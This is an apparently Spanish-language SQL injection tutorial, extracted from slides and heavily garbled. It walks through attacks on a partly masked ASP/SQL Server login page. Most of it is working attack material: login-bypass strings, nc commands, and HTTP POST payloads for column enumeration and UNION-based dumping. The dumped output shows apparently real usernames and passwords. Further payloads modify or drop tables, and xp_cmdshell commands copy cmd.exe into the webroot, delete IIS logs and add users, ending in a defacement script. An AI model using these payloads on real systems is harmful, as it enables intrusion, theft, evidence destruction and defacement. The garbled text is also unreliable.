  • 15. ? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
  • 16. @ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
  • 17. " " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
  • 18. B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
  • 19. C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
  • 20. ----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
  • 21. 8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
  • 22. Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
  • 23. 2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
  • 24. 3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
  • 25. ? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
  • 26. @ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
  • 27. ( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
  • 28. B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
  • 29. C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
  • 30. 2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
  • 31. 2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
  • 32. 2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
  • 33. 22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
  • 34. 23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
  • 35. 2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
  • 36. 2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
  • 37. 2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
  • 38. 2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
